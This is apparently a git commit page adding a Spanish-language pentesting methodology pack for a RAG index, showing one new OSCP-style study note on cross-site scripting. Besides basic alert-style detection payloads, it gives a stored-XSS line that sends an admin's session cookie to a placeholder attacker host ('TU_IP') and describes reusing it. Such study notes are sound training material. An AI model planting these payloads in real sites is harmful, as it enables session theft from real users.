saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
28
nucleo/saber/conocimiento/02 - Explotacion web/XSS.md
Normal file
28
nucleo/saber/conocimiento/02 - Explotacion web/XSS.md
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
# XSS (Cross-Site Scripting)
|
||||
|
||||
> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.
|
||||
|
||||
## Tipos
|
||||
```
|
||||
Reflected → tu payload vuelve en la respuesta de ESA petición (?q=<script>...)
|
||||
Stored → se guarda (comentario, perfil) y se dispara a quien lo vea (más potente)
|
||||
DOM → el JS del cliente mete tu input en el DOM sin sanear
|
||||
```
|
||||
|
||||
## Detección y payloads
|
||||
```html
|
||||
<script>alert(1)</script>
|
||||
<img src=x onerror=alert(document.domain)>
|
||||
"><svg onload=alert(1)>
|
||||
```
|
||||
Prueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).
|
||||
|
||||
## Para qué sirve en OSCP
|
||||
- **Robar la cookie de sesión** de un admin (XSS stored en un panel que el admin revisa):
|
||||
```html
|
||||
<script>new Image().src='http://TU_IP/c='+document.cookie</script>
|
||||
```
|
||||
La recibes en tu `python3 -m http.server` → la usas en Authentication attacks.
|
||||
- A veces el panel admin tiene una función que escala a RCE / File upload bypass.
|
||||
|
||||
Relacionado: SSTI · Authentication attacks · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue